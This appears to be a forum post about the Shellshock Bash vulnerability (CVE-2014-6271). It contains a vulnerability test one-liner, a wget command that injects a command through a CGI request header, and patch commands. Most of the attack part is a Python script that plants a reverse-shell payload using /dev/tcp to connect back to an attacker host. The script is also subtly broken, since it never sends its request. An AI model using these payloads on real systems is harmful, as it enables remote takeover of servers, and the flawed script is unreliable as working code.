Jump to content

Shellshock - Bash bug


Recommended Posts

Stephane Chazelas U.K. @ robotics company SeeByte find a bug in BASH


A quick test to check if you are vulnerable (debian, ubuntu, unix (FreeBSD).. )

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

if your terminal respond : vulnerable you are vulnerable
The problem is the following -> the code continue to execute after the ; -> and here you can inject malicious code ...


wget -U "() { test;};/usr/bin/touch /tmp/VULNERABLE" myserver/cgi-bin/test

You have to update your bash by paquets in couple of days

CentOS : # yum update bash

Debian : # apt-get update bash

FreeBSD : # portsnap fetch update



Example of attack could be perform (in this example a Reverse Shell by http header)

#CVE-2014-6271 cgi-bin reverse shell

import httplib,urllib,sys

if (len(sys.argv)<4):
    print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0]

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
Edited by Armaal
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...